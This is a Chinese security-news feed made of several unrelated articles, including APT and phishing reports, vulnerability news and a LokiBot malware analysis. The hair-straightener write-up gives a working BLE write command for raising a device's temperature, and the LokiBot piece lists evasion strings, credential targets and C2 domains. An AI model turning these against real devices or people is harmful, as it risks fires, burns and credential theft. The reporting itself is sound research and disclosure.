在启用了网络级别身份验证(NLA)的受影响系统上进行了部分缓解。在安装该补丁之后可以缓解该漏洞引发的“wormable”恶意程序或者高级恶意程序威胁,因为NLA在触发漏洞之前需要进行身份验证。如果攻击者拥有可用于成功进行身份验证的有效凭据,受影响的系统仍然容易受到远程执行代码执行(RCE)的攻击。

微软建议公司立即安装修复补丁,可以从此处的Microsoft安全更新指南下载。微软指出,这些漏洞是公司内部工程师发现的,是企图加强RDS安全性的一部分。微软还指出,它还没有任何证据表明这些漏洞已经被任何恶意行为者利用。

9999.jpg

]]>
手机App竟然能让头发拉直器起火? Sun, 18 Aug 2019 13:46:49 +0800 hair-burn-haxor.png

多年来,我们一直专注于物联网(IoT)方面的安全研究,并试图找出它们的漏洞来hack这些联网设备。

在不久前,我们曾对号称全球首款无线电水壶的iKettle进行了安全测试,但并没有什么收获。

glamo-box.png

转而我们将目光瞄准了智能头发拉直器。在圣诞期间电视上大力推广的Glamoriser拉直器;由于其BLE与移动应用的连接特性,引起了我的兴趣。

你可以在关机前更改温度和空闲时间。

对于有狂热意图的我们来说,这似乎是一个更好的hack对象;我们可以尝试将它的最高温度调至纸张闪点(233C/451F)之上。

一项在线调查显示,英国一消防部门称,拉直器已在全英造成多达65万起的房屋火灾事故。显然,三分之一的拉直器用户都烧伤过自己!

bed-fire-768x512.png

移动应用

该应用设计的非常简单:温度控制和超时。你可以在谷歌应用商店里下载到它。

glamo-app.png

Googleplay Store:https://play.google.com/store/apps/details?id=com.fenda.diva

对APK的反编译工作非常顺利,99%的代码都完好无损。这对我们之后的代码查找工作会有所帮助。

该应用可直接与Alexa和AWS服务连接。“Assets”文件夹中存储了一个通用的API密钥:

glamo2.png

api_key.txt文件实际上是一个JWT(Java Web Token):

glamo3.png

Android应用已启用备份:

glamo4.png

蓝牙挖掘

通过BT4 dongle和运行的BLEAH,我们可以更详细地查看设备:

glamo5.png

该设备的通用名为“Bluetooth Styler”。它的“Peripheral Privacy Flag”已被禁用,我们可以“WRITE(写)”到0015 Handle(句柄)…

让我们来看一些代码。

看看应用程序是如何使用BLE协议进行工作的,可以看到几乎所有的内容都被记录到了LOG:

glamo6.png

10.png

通过代码库进一步搜索,我们找到了BLE通信的状态UUID字符串:

11.png

BES_DATA_CHARACTERISTIC_TX_UUID是之前的写入特征。

还有一些代码概述了BLE命令:

12.png

从这里我们可以看到,命令是由不同的部分构建的:

13.png

CheckSum(校验和)值的计算方式如下:

14.png

因此,现在我们知道了如何发送BLE命令,让我们确认下我们是对的。

通过查看手机的SD卡,我们可以看到创建了多个文件和文件夹:

15.png

创建的Log.txt文件准确列出了BLE通信的内容:

2019-02-12 12:43:44V<BleService>---onConnectionStateChanged connected = false2019-02-12 12:43:44V<BleService>---isHumanDisconnect = false2019-02-12 12:43:44V<BleService>---quickyDisconnectCount = 02019-02-12 12:43:44V<BleService>---totalReconnectCount = 12019-02-12 12:43:44V<BleService>---totalReconnectCount < 10  and equels  =   12019-02-12 12:43:44V<BleService>---totalReconnectCount < 5 and reconnect after 5002019-02-12 12:43:44V<BleService>---handleMessage msg.what == RECONNECT  reconnectMAC= F0:13:C3:00:4B:8C2019-02-12 12:43:44V<BleService>---onConnectionStateChanged connected = true2019-02-12 12:43:45V<BleService>---onConnectionStateChanged handle discoverServices2019-02-12 12:43:45V<BleService>---onServicesDiscovered() + status = 02019-02-12 12:43:45V<BleService>---onCharacteristicNotifyEnabled() + status = 02019-02-12 12:43:45V<BleService>---READY TO SEND DATA IS = 54,45,eb,50,c8,00,05,f8,2019-02-12 12:43:45V<BleService>---READY TO SEND DATA IS WRITH TO HAL RET IS  = true2019-02-12 12:43:45V<BleService>---onWritten() + status = 02019-02-12 12:43:45V<BleService>---onReceive BES_DATA_CHARACTERISTIC_RX_UUID2019-02-12 12:43:45V<BleService>---onReceive 54,45,f8,

从该日志文件中我们还可以看到,从设备发送的ACK确认命令已被接收并执行。

通过更改移动应用程序上的某些值然后查看日志,我们可以看到发送的数据:

16.png

54,45,eb,50,50,00,05,70, 5 mins 80 °C
54,45,eb,50,5a,00,05,66  5 mins 90 °C
54,45,eb,50,64,00,05,5c, 5 mins 100 °C
54,45,eb,50,96,00,05,2a  5 mins 150 °C
54,45,eb,50,c8,00,05,f8  5 mins 200 °C

让我们看看是否可以发送一些数据并让拉直器做点什么(坏笑)。首先,我们需要计算checksum。

为此,我们编写了一个Java脚本:

17.png

此Java代码将为我们计算校验和,并打印出我们需要发送的值。

有一点需要注意!设备和手机之间的BLE通信并没有验证。只要设备处于开启状态(通过主电源插座),就可以将数据随时发送到设备。

bleah -b “f0:13:c3:00:4b:8c” -u “0783b03e-8535-b5a0-7140-a304f013c3ba” -d “0x5445EB50EB0014C6”

哇!我们做到了!

这意味着只要拉直器处于打开状态,我们就可以向其发送命令来更改它的温度!

我们测试一下,看看是否可以将设备温度上调至235C以上,遗憾的是这并不起作用,但这不重要。

如果你发出超过235C或低于50C的温度请求,它将不会在设备上注册,因此我怀疑设备的温度可能存在某种限制。

此外,拉直器在时间上也做了限制,即最长持续运行时间为20分钟。拉直器上有个物理开关,如果它没被按下,那么它将自动关闭。

你可以做的是在他们使用时覆盖这些设置。例如,如果有人在120°C下使用拉直器,并且睡眠时间为使用后5分钟,则你可以将其改为235°C和20分钟的睡眠时间。

让过程更加简单

对于有的人来说,逆向并非一件简单的事。其实在本例中,逆向非不是所必须的步骤。由于在连接手机时没有在BLE上建立配对或绑定,因此应用范围内的任何人都可以控制拉直器,但并不支持多个手机的并发连接。此外,如果用户超出了BLE的范围,那么你本地的黑客很有可能侵入并调高它们的温度。

总结

如果不安全使用,直发器可能会导致房屋火灾和皮肤灼伤。

我们已经证明了拉直器的温度可以随时被我们篡改,因此即使用户安全使用拉直器,它们也未必真的安全。

当然,这种攻击要求黑客必须处于蓝牙范围内,但是对于制造商来说,包含配对/绑定功能可以很容易地防止这种情况的发生。

只要按下按钮将拉直器置于配对模式就可以解决这个问题。

相反,现在我们有了一种让房屋起火的方法。

9999.jpg

]]>
全球顶级黑客组织巡礼——Machete攻击委军方 Sun, 18 Aug 2019 13:46:49 +0800 提到网络安全和黑客组织,人们往往联想到的国家是美国、俄罗斯、中国、伊朗、以色列以及一些欧洲国家,拉丁美洲国家在面对持续网络威胁和具有政治动机的黑客组织方面往往被人忽视。



事件概览


最近出现了一系列针对拉丁美洲国家的网络间谍活动案例已经引发了人们的重视。这些攻击事件背后的黑客组织窃取了大量机密文件,其中大部分来自委内瑞拉政府组织。截至目前,这些活动仍然非常活跃,威胁行为者定期对其恶意软件、基础设施和鱼叉式网络钓鱼活动进行完善。


网络安全公司ESET近期一直在追踪新版本的Machete后门工具,新版本于2018年4月首次出现。虽然该后门的主要功能与以前的版本相同,但它在最近一年的拓展中还是显示了一定的新功能。


攻击目标


大多数Machete的受害者都位于委内瑞拉、厄瓜多尔、哥伦比亚、秘鲁、俄罗斯、古巴、西班牙等等。在某些情况下,诸如俄罗斯,目标似乎是针对俄罗斯境内的某些大使馆。目标包括高层人物,其中包括情报部门,军队,驻外使馆和政府机构。


从今年3月底到5月底,ESET研究人员观察到有超过50台受感染计算机正在与威胁行为者的C&C服务器进行通信,每周都会向其上传大量数据。超过75%的受感染计算机位于委内瑞拉政府组织,包括军队、教育部门、警方和外交部门。此外,也有其他拉丁美洲国家涉及其中,;例如厄瓜多尔军队是另一个遭遇Machete恶意软件攻击的政府组织。具体的受害国家/地区如下图所示:


2019年受影响的拉丁美洲国家


攻击过程


Machete攻击者通常使用的是高效的鱼叉式网络钓鱼技术。他们针对拉丁美洲国家发动长期持续的攻击,多年来收集情报并一步步改进战术。攻击者非常明确自己的目标,如何采用社会工程学进行沟通,以及能窃取的哪些文件最有价值。Machete不仅可以处理常见的办公套件文档,还可以提取地理信息系统(GIS)软件处理的专用文件类型。据悉,该黑客组织对使用军事网格描述导航路线和定位的文件最感兴趣。


Machete攻击者直接向受害者发送非常具体的电子邮件,这些电子邮件包含运行恶意软件的压缩自解压存档的链接或附件,并打开诱饵文档。下图显示了攻击者向潜在受害者发送的典型PDF文件。为了欺骗毫无防备的受害者,攻击者使用的是他们从别处窃取来的真实文件:


诱饵PDF文件(模糊)


Machete具体的组件


该恶意软件能够从受感染计算机上窃取数据,包括:


  • 截图;

  • 记录击键;

  • 访问剪贴板;

  • 使用AES算法加密文件,并将加密后的文件上传到C&C服务器;

  • 检测新插入的驱动器并复制文件;

  • 执行从C&C服务器下载的其他二进制文件;

  • 从系统中检索特定文件;

  • 从多个浏览器中检索用户配置文件数据;

  • 收集受害者的地理位置和附近Wi-Fi网络的信息;

  • 对可移动驱动器执行物理渗透。


分析表明,除Microsoft Office文档外,攻击者还对如下文件感兴趣:


  • 备份文件;

  • 数据库文件;

  • 加密密钥(PGP);

  • OpenOffice文档;

  • 矢量图像;

  • 地理信息系统文件(地形图、导航路线等)。


结论


Machete攻击者非常活跃,自2018年4月发布新版本以来,已对其恶意软件进行了多项更改,之前的版本由卡巴斯基于2014年和Cylance于2017年披露。


通过对Machete源代码以及网络基础设施的分析,ESET公司认为这个APT组织来自某个讲西班牙语的国家,“Machete”在西班牙语中指“有针对性的攻击活动”,但目前尚不能完全肯定。

9999.jpg

]]>
挑衅?疑似BITTER APT继续瞄准中国政府组织 Sun, 18 Aug 2019 13:46:49 +0800 网络安全公司Anomali威胁研究小组最近发现了一个网络钓鱼网站冒充中国外交部电子邮件服务的登录页面。当访问者尝试登录该页面时,会收到弹出的验证消息,要求用户关闭窗口并继续浏览。



事件概览


研究人员对威胁行为者基础设施的进一步分析揭示了这个针对中国政府网站和国有企业的更广泛的网络钓鱼活动。他们推测威胁行为者试图窃取中国政府官员的用户名和密码,这是明显的网络间谍活动。


调查期间发现的其中一个恶意域名被安全厂商“CERT 360”确定为2019年5月“BITTER”APT组织活动的一部分。Anomali已经确定了BITTER组织进一步针对中国政府的攻击尝试——通过伪造登录页面,窃取用户凭据并获得对特权帐户信息的访问权限。根据“Let's Encrypt”颁发的域验证(DV)证书日期,研究人员认为此活动自2019年5月开始。


Anomali研究人员确定了一个看起来类似外交部电子邮件登录页面的网站。进一步的调查显示,这样的网站大约有40个,其中所有网站似乎都针对中国的政府和其他组织。所有站点都使用“Let's Encrypt”颁发的域验证(DV)证书。子域似乎具有相似的命名规律,主要针对在线邮件登录并包含验证或帐户验证主题。


BITTER (蔓灵花)组织


BITTER 组织是一个长期针对中国、巴基斯坦等国家进行攻击活动的APT组织,该APT组织为目前活跃的针对境内目标进行攻击的境外APT组织之一。该组织主要针对政府、军工业、电力、核等单位进行攻击,窃取敏感资料,具有强烈的政治背景。该组织最早在2016由美国安全公司Forcepoint进行了披露,并且命名为“BITTER”,同年国内相关研究单位也跟进发布了分析报告,将该组织命名为“蔓灵花”。


BITTER攻击始于2013年11月,但一直到2016年才第一次被曝光。2018年五月份被观察到了疑似该组织对我国境内敏感单位的攻击活动,但是由于当时无法下载到具体的攻击模块,因此无法进行进一步的关联和分析。而在十月底,再次捕捉到了疑似该组织对我国的军工业、核能、政府等重点单位的攻击,并且获取到了完整的攻击武器库,经过进一步的关联分析,研究人员确认该攻击组织就是2016年曝光的“蔓灵花”。而有趣的是,研究人员进一步分析溯源发现,该组织跟“白象”(摩诃草、HangOver、Patchwork)也有千丝万缕的关系。



网络钓鱼网站详细信息


下面是研究人员最早发现和调查的一个网站,该网站托管在域名“btappclientsvc .net”上,已于2019年5月30日注册。


针对中国外交部的钓鱼网站


该网络钓鱼网站似乎旨在窃取外交部(MFA)的电子邮件凭据。一旦用户输入他们的凭证,他们就会看到下图中的消息。
受害者登录该网站后弹出的消息



除此之外,还有许多伪装成政府部门和企业组织的虚假网站,如下所示:





具体来说,此次受影响的网站包括:


  • 中华人民共和国外交部(MFA)

  • 国家发展和改革委员会

  • 国务院国有资产监督管理委员会(SASAC)

  • 中华人民共和国商务部(MOFCOM)

  • 中国国家航空技术进出口总公司(CATIC)

  • 中国电子进出口总公司(CEIEC)

  • 中国长城工业总公司(CGWIC)

  • 中国核工业集团公司(CNNC)

  • 中国中原工程总公司(CZEC)

  • 航空工业公司中国(AVIC)

  • 保利拍卖香港有限公司


Anomali研究人员在他们的研究结果中指出,可以预期BITTER将继续以中国政府为目标,采用旨在窃取用户凭据并获取特权帐户信息的欺骗性登录页面。据悉,该组织背后有国家力量参与其中,但Anomali无法确定此次活动背后具体的国家。

9999.jpg

]]>
这些看似合法的iPhone Lightning数据线将劫持您的电脑 Sun, 18 Aug 2019 13:46:49 +0800 被称为MG的安全研究人员在年度Def Con黑客大会上展示并且演示了他开发的iPhone Lightning数据线,这种恶意数据线内含额外的恶意组件,包括恶意硬件和恶意软件载荷,可以在受害者将数据线插入电脑时发动无线攻击。

MG表示,这条数据线看起来像一个合法产品,可以正常连接电脑和iOS设备,甚至被连接的电脑不会注意到差异。但是攻击者可以通过无线方式控制数据线进而控制受害者的电脑。MG在他自己的手机浏览器上键入恶意数据线的IP地址,并显示了一个选项列表,并且可以在连接的Mac上远程打开一个终端。从这里,黑客可以在受害者的电脑上运行各种工具。

这种恶意Lightning数据线带有各种有效负载,攻击者可以在受害者机器上运行的脚本和命令。黑客还可以远程“杀死”恶意Lightning数据线当中的植入物,以隐藏或者销毁攻击证据。MG目前以200美元的价格出售这些恶意恶意Lightning数据线。

MG表示,无线有效攻击距离达到300英尺,如果必要,黑客可以使用更强的天线进一步延伸攻击距离,如果该无线网络具有互联网连接,则攻击距离基本上变得无限制。现在MG希望批量生产这种数据线作为合法的安全工具。MG表示,这些数据线将从头开始制造,而不是改装苹果Lightning数据线。

hackedcablemotherboard-800x449.jpg

9999.jpg



]]>
因《堡垒之夜》用户数据泄露 Epic或将面临集体诉讼 Sun, 18 Aug 2019 13:46:49 +0800 根据最新消息,由于《堡垒之夜》存在泄漏用户个人数据(信息)的情况,Epic公司或将面临集体诉讼,以下为详细内容。近日,美国律师团队Franklin D. Azar & Associates开始向《堡垒之夜》的玩家发起号召:“希望大家能够加入集体诉讼,通过斗争方式来维护自己的合法权益。

据悉,《堡垒之夜》之前出现的系统安全漏洞曾经带来了很严重的隐患,黑客甚至可以通过这些漏洞访问《堡垒之夜》用户的信用卡和借记卡,更不用说是个人信息了。虽然Epic已经修复了这个安全漏洞,但是律师团队Franklin D. Azar & Associates却指出:“由于Epic公司是在安全漏洞出现两个月之后才进行修复的,因此玩家们完全有权利向该公司发起集体诉讼。

该律师团队表示:“《堡垒之夜》用户曾经在比较长的一段时间内都面临着安全隐患,而且还因欺诈性收费而蒙受了不小的损失,使得这些用户不得不自行采取额外的安全保护措施。而Epic公司在保护用户信息这一点上并不到位,也未能及时为用户提供安全措施,这是不合理的。”

目前,根据律师团队Franklin D. Azar & Associates所言,已经有100多人参与到了了集体诉讼中。至于Epic未来会面临怎样的处境,还请关注我们的后续报道。

9999.jpg

]]>
KDE 发现类似 Autorun.inf 的漏洞,问题已修复 Sun, 18 Aug 2019 13:46:49 +0800 安全研究员 Dominik "zer0pwn" Penner 在 KDE Frameworks 5.60.0 中发现了一个自动执行漏洞,类似 Windows 的 Autorun.inf。 KDE Frameworks 软件库是 KDE 桌面环境的基础。漏洞与 KDesktopFile 类 处理 .desktop 或 directory 文件的方式有关。当用户使用 KDE 文件浏览器打开一个储存有恶意.desktop或 .directory 文件的目录,文件包含的恶意代码能自动执行无需用户操作。KDE 项目已经释出了 KDE Frameworks 5.61.0 修复了该漏洞,同时对安全研究员不按照正确方式报告漏洞直接公开的做法表达了不满。

9999.jpg

]]>
Invoice钓鱼邮件姿势多,进出口企业机密信息易泄漏 Sun, 18 Aug 2019 13:46:49 +0800 0×0 背景

近日,深信服安全团队接到某大型进出口企业反馈,根据安全感知平台提示,内网部分邮箱遭受到恶意邮件的攻击。通过安全研究人员分析发现,该恶意邮件包含一个疑似lokibot恶意软件的附件,主要是用于窃取用户各类账号密码等机密信息。通过过程中的一些数据分析确定这是一起针对特定行业的定向攻击事件。

0×1 过程

通过对安全感知平台里面的安全日志分析可以发现,客户的部分邮箱收到了很多恶意邮件,发件人地址主要是srwuIan@maybank.co.id (maybank:马来西亚银行),maybank迷惑用户取得信任。主题为Remittance advice(汇款通知单),而且针对的收件人对象也很明确,主要包括此类公共邮箱:planning(计划)、dataprocess(数据处理)、barge(船舶)、bargecontrol 、dpsloading(dps:船舶动力定位系统)等,截图如下:

图片0.png

源地址是一个来自美国的IP地址:142.4.5.244

图片1.png

通过Virustotal对该IP进行关联,未发现相关的恶意行为。

图片2.png

0×2 恶意附件

源附件为一个575Kb的可执行程序,主要伪装成了一个音频文件的图标,查看木马母体信息是一个用Delphi封装的文件,编译的时间戳被修改为1991-12-20。

图片3.png

病毒母体在执行的过程中会首先解密payload到进程内存中执行,先进行反虚拟机、反沙箱、反杀软、反调试分析等操作,相关字符信息如下:

功能模块特征字符举例
反虚拟机VMwareVMware、XenVMMXenVMM、prl hyperv、Microsoft Hv、KVMKVMKVM
反沙箱sandbox、malware、sample、virus、selfrun
反杀软avp.exe、avastsvc.exe、avastui.exe、avgsvc.exe、avgui.exe、bdagent.exe、bdwtxag.exe、dwengine.exe
反调试分析procexp64.exe、procmon64.exe、procmon.exe、ollydbg.exe、procexp.exe、windbg.exe

payload中使用大量的跳转来干扰调试,随后从资源中解密出PE文件后注入新的同名进程,该文件就是LokiBot的核心功能体。

图片4.png

LokiBot是在地下网站上销售的商业恶意软件,其功能是从受感染机器中窃取私人数据,然后通过HTTP POST将该信息提交给CC主机,敏感数据主要包括:存储的密码,Web浏览器、FTP、SFTP的密码和凭证等信息。

窃取信息模块特征字符举例
浏览器IE系列 、Mozilla Firefox (x32+x64)、Google Chrome、Opera
连接工具FileZilla、Xftp、FlashFXP、Vandyk SecureFX、WinSCP、RealVNC
Email端Foxmail、Outlook

图片5.png

下图主要为实现读取Mozilla 用户登录凭证的部分功能:

图片6.png

恶意程序会将窃取到的主机信息与敏感信息发送到C&C服务器,由于分析时C&C端没有开启,这里本地使用SimpleHTTP来模拟接收发送的数据内容,目的地址为:slomiter45u.us 。

可以清晰的发现木马向C2进行POST上传数据会带一个特殊字符“ckav.ru”,根据已知的情报,该域名可能与某地下黑客交易站点有关。

图片7.png

0×3解决方案

1、不要点击来源不明的邮件附件,特别是附件为可执行文件、带有宏的文档时,应提高警惕。

2、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀:

64位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

9999.jpg

]]>
中信银行因重大故障等原因未上报,被罚 2190 万元 Sun, 18 Aug 2019 13:46:49 +0800 2019年8月9日中国银行保险监督管理委员会发布《行政处罚信息公开表(银保监罚决字〔2019〕12号)》显示,中信银行因涉及13项违法违规事实,没收违法所得33.6677万元,罚款2190万元,合计2223.6677万元。

timg (2).jpg

具体涉及:


(一)未按规定提供报表且逾期未改正;
(二)错报、漏报银行业监管统计资料;
(三)未向监管部门报告重要信息系统运营中断事件;
(四)信息系统控制存在较大安全漏洞,未做到有效的安全控制;
(五)未按企业划型标准将多家企业划分为小微型企业,报送监管数据不真实;
(六)向关系人发放信用贷款、向关系人发放担保贷款的条件优于其他借款人同类贷款条件;
(七)重大关联交易未按规定审查审批且未向监管部门报告;
(八)贷后管理不到位导致贷款资金被挪用;
(九)以流动资金贷款名义发放房地产开发贷款;
(十)未将房地产企业贷款计入房地产开发贷款科目;
(十一)投资同一家银行机构同期非保本理财产品采用风险权重不一致;
(十二)购买非保本理财产品签订可提前赎回协议,未准确计量风险加权资产;
(十三)未按规定计提资产支持证券业务的风险加权资产。


行政处罚依据:


《银行业监管统计管理暂行办法》(中国银监会令 2004年第6号)第八条、第三十六条,《流动资金贷款管理暂行办法》(中国银行会令 2010年第1号)第九条、第三十九条,《商业银行与内部人和股东关联交易管理办法》(中国银监会令 2004年第3号)第二十二条、第二十五条、第四十二条、第四十四条,《商业银行资本管理办法(试行)》(中国银监会令2012年第1号)第一百七十八条、附件9第二条,《中华人民共和国商业银行法》第四十条、第七十四条,《中华人民共和国银行业监督管理法》第二十一条、第四十六条、第四十七条的规定和相关内控管理和业务审慎经营规则。

9999.jpg

]]>
研究发现超过40个Windows设备驱动程序包含提升权限的漏洞 Sun, 18 Aug 2019 13:46:49 +0800 在今年拉斯维加斯举行的DEF CON会议上,来自网络安全公司Eclypsium的研究人员分享了他们的调查结果。结果显示,来自20家硬件供应商的40多名不同驱动程序包含的代码包含缺陷,可能被利用来加剧特权攻击升级。更令人担忧的是,所有这些驱动程序都经过微软认证。

受影响的公司名单包括主要的BIOS供应商以及华硕,华为,英特尔,NVIDIA和东芝等硬件制造商。Eclypsium还提醒说,这些驱动程序会影响所有版本的Windows,这意味着数百万用户可能面临风险。
这些驱动程序造成的风险是它们可能允许用户级别的恶意应用程序获得内核权限,从而直接访问固件和硬件本身。这也可能意味着恶意软件可以直接安装到固件中,因此,即使重新安装操作系统也不足以摆脱它。
Eclypsium解释了这些漏洞的的问题来源:
所有这些漏洞都允许驱动程序充当代理,以执行对硬件资源的高权限访问,例如对处理器和芯片组I/O空间的读写访问,模型特定寄存器(MSR),控制寄存器(CR),调试寄存器(DR),物理内存和内核虚拟内存,从而实现权限提升,因为它可以将攻击者从用户模式(Ring 3)移动到OS内核模式(Ring 0)。保护环的概念总结在下图中,其中每个内环被逐渐授予更多特权。值得注意的是,即使是管理员也可以与其他用户一起在Ring 3(并且没有更深层次)进行操作。访问内核不仅可以为攻击者提供操作系统可用的最高权限访问权限,还可以授予对具有更高权限(如系统BIOS固件)的硬件和固件接口的访问权限。

640.webp.jpg

由于驱动程序通常是更新固件的手段,“驱动程序不仅提供必要的权限,还提供进行更改的机制,”Eclypsium指出。如果系统中已存在易受攻击的驱动程序,则恶意应用程序只需搜索它以提升权限。但是,如果驱动程序不存在,恶意应用程序可能会带驱动程序,但需要管理员批准才能安装驱动程序。
Eclypsium的首席研究员Mickey Shkatov在给ZDNet的一份声明中指出,“微软将使用其HVCI(虚拟机管理程序强制执行的代码完整性)功能,将报告给他们的驱动程序列入黑名单。”但是,该功能仅适用于第7代及更高版本的英特尔处理器,因此在旧CPU或甚至禁用HCVI的较新CPU的情况下需要手动卸载驱动程序。
微软进一步澄清:“为了利用易受攻击的驱动程序,攻击者需要已经破坏了计算机。”但是,这里的问题是,在上述特权级别表示中已经在Ring 3上破坏了系统的攻击者可以获得内核访问权限。
为了保护自己免受不良驱动因素的影响,微软建议用户使用“Windows Defender应用程序控制来阻止已知的易受攻击的软件和驱动程序”。它还表示,“客户可以通过为Windows安全中的功能强大的设备启用内存完整性来进一步保护自己。
Eclypsium提供了一个完整的列表,列出了所有已经在其博客文章中更新过驱动程序的供应商,尽管他们注意到一些受影响的供应商尚未榜上有名,因为他们仍在努力提供修复。研究人员还会在GitHub上传一份受影响的驱动程序及其哈希列表,以便用户可以在他们的设备上手动禁用它们。

9999.jpg

]]>
国家保密局:严禁使用钉钉谈论、处理、存储及传输国家秘密! Sun, 18 Aug 2019 13:46:49 +0800

作为一款国产智能移动办公平台,钉钉自2015年面世至今,已有不少企业、组织在使用其办公。

640.webp.jpg

图片来自钉钉官网

对于大多数机关单位而言,钉钉提供了“简单、高效、安全”的工作方式。

今天我们要和大家探讨的是,国家机关和涉及国家秘密的单位可以使用钉钉吗?如何打造可管可控的政务服务平台?

切勿用“钉钉”存储、传输国家秘密

国家保密局在8月8日发布的《机关、单位可以使用钉钉办公吗?》一文中强调,无论在计算机端还是移动端使用钉钉,都是基于互联网办公,因此严禁使用钉钉谈论、处理、存储及传输国家秘密。

保密法第二十六条

禁止非法复制、记录、存储国家秘密。

禁止在互联网及其他公共信息网络或者未采取保密措施的有线和无线通信中传递国家秘密。

禁止在私人交往和通信中涉及国家秘密。

文章指出,使用钉钉的环境以及数据传输过程均不安全。

具体来说,钉钉主要在连接互联网的计算机和智能手机这两个终端上使用,计算机只要连接互联网,就难免会有病毒、“木马”程序隐蔽植入运行,使得计算机被远程控制,甚至被“摆渡”攻击,造成泄密,而智能手机很有可能安装一些带有隐秘搜集、获取、记录数据信息的恶意APP,都会带来泄密隐患。

至于在互联网上传输的数据,则一定程度上都存在安全隐患,无法保障传输过程的绝对安全。

640.webp.jpg

那么,在不涉及国家秘密时,国家机关和涉及国家秘密的单位就能否毫无顾虑地使用钉钉呢?也不尽然。

国家保密局具体列举了以下几项需要遵守的保密守则:

认识第一位。钉钉就是互联网办公,强化干部职工保密意识,提升保密防范技能。

发布严审核。通过钉钉发布消息、通知,必须执行审核签发制度,对拟推送的信息进行保密审查,内容严格限制在周知性的一般信息。

沟通不涉密。钉钉的聊天和通话功能具有通话加密、读后自动销毁、头像名字打码防截屏等保密功能,能保个人隐私,但保不了工作秘密,更保不了国家秘密;严禁用钉邮发送涉及国家秘密的邮件。

办公不涉密。不使用钉盘存储国家秘密;不使用审批功能处理国家秘密;不使用智能会议室功能召开涉密会议;不使用直播功能直播涉密活动;最好不使用脸部识别打卡考勤等功能,以保护生物信息、敏感地理位置、出行信息不泄露。

打破壁垒 信息数据“一网管”

随着全国一体化政务服务平台建设进程加快,大量涉及国家利益、公共安全、商业秘密、个人隐私等重要数据将日趋集中,数据集中可以充分发挥数据价值,同时,也将面临更大的数据安全风险。

保障信息安全、可管可控,需要强化网络安全底线思维,树立正确的网络安全观。积极运用自主可控技术,提升安全保障系统的风险防控能力,共同构建全方位、多层次、一致性的防护体系。

政府服务平台从设计逻辑到应用实践需始终遵循以保障信息安全为前提。首先,平台需拥有完全自主知识产权,保障技术上的自主可控。其次,平台要通过各种技术手段,实现登录认证安全、通信协议安全、敏感信息安全、数据存储安全等全方位安全防护体系,构筑安全可靠的平台生态。最后,平台可细分独立的组织架构,通过精细到个人的权限设置、分级管理,避免人为造成的信息安全隐患。实现在高效便捷的同时,从多维度共同铸造一体化政务服务平台的云盾牌。来源:汉中市委官方微信  

9999.jpg

]]>
零日漏洞:强大又脆弱的武器 Sun, 18 Aug 2019 13:46:49 +0800 所有软件都存在漏洞,其中一些漏洞是能被武器化的安全漏洞。

零日漏洞定义

零日漏洞就是供应商尚未修复的安全漏洞,可被攻击者转化为强力武器加以利用。出于军事、情报和司法目的,某些政府会找寻、购买和使用零日漏洞。但这种操作颇引争议,因为其他攻击者若发现相同漏洞,整个社会都会因政府的隐瞒不报而面临风险。

零日漏洞在黑市奇货可居,往往能卖得高价,漏洞奖励项目则旨在鼓励发现安全漏洞并向供应商报告。修复危机意味着零日漏洞重要性降低,所谓的“旧日漏洞” (0ld-day) 也几乎同样有效。

为什么零日漏洞十分危险?

零日漏洞因漏洞补丁存在天数为零而得名。一旦供应商发布安全补丁,漏洞就不再称之为零日漏洞。此后,该安全漏洞便加入了可修复但没修复的旧日漏洞大军。

大约十年前,一个零日漏洞就足以执行远程入侵。发现和持有任何一个零日漏洞都能让你感觉自己是网络之神。

如今,不联合使用几个乃至几十个小零日漏洞,往往都无法突破 Windows 10 或苹果 iOS 等消费级操作系统中的安全缓解措施,更别提获取目标的完全控制权了。所以,当前黑市上远程执行零日漏洞的价格堪称天价。

零日漏洞举例

然而,不是所有的零日漏洞都很复杂或昂贵。流行视频会议软件 Zoom 就存在一个很恼人的零日漏洞,任何网站都可以利用该漏洞强拉用户进入 Zoom 视频会议,不经用户允许就启动用户的摄像头。不仅如此,利用该漏洞,网页可通过不停强拉用户进入非法视频会议而对 Mac 主机实施拒绝服务 (DoS) 攻击。Zoom 的 Mac 客户端还会在用户笔记本电脑上安装 Web 服务端,即便清除了该软件,仍能在用户不知道的情况下重新安装 Zoom 客户端。

真的是一个非常烦人的零日漏洞。更糟的是,这么大的安全漏洞,Zoom 这么大个公司竟然响应迟缓,逼研究人员不得不直接释放零日漏洞。(注:“释放零日”指的是公布安全漏洞的细节以迫使拖沓的供应商修复他们的漏洞。)

能让攻击者远程开启麦克风和摄像头这么简单的安全漏洞却尤其危险,因为这种漏洞给了罪犯窥探受害者所处环境的眼睛和耳朵,受威胁的不仅仅是电脑上的信息。这种漏洞在黑市和灰市上尤为紧俏。

零日漏洞黑市

想一举入账 150 万美元?找出合适的 iPhone 零日漏洞卖给 Zerodium,这家漏洞奖励项目领头羊的网站上宣称会支付“漏洞市场最高奖金”。Zerodium 这样的漏洞代理商只服务军事-情报机构,但专制政权的秘密警察也会购买零日漏洞利用程序去黑记者和迫害异议分子。

与限制仅可销售给获准政府的灰市不同,黑市不限制买家,犯罪组织、毒枭和朝鲜或伊朗这些被灰市排斥的买家也可以在黑市买到想要的漏洞利用。

至少目前来看,《瓦森纳协议》难以监管零日漏洞利用黑/灰市。《瓦森纳协议》限制离心机等军民两用技术出口至禁售国。2013 年一项控制可作恶意用途商品的提案被否决,很多人都认为该提案弊大于利。

如今,只要足够有心,任何政府或犯罪组织都能弄到黑客工具,包括零日漏洞利用。监管形同虚设。

漏洞奖励项目 vs. 协同漏洞披露

毫不顾忌自己的零日漏洞可能助纣为虐的黑帽子,可以从黑市或灰市赚取够高佣金。有良心的安全研究员,可以通过向供应商报告零日漏洞致富。有点规模的公司企业都应设立漏洞披露过程,公开承诺会暂留安全问题的善意报告,并内部分析所报告的问题。这种操作如今已是 ISO 29147 和 ISO 30111 标准中的最佳实践了。

为鼓励零日漏洞报告,公司企业可以选择提供漏洞奖励项目,通过支付给道德安全研究人员的大笔经济奖励,来刺激零日漏洞研究与披露。奖金数额跟黑市卖价没法比,但旨在褒奖行正义之事的安全研究人员。

政府应该囤积零日漏洞吗?

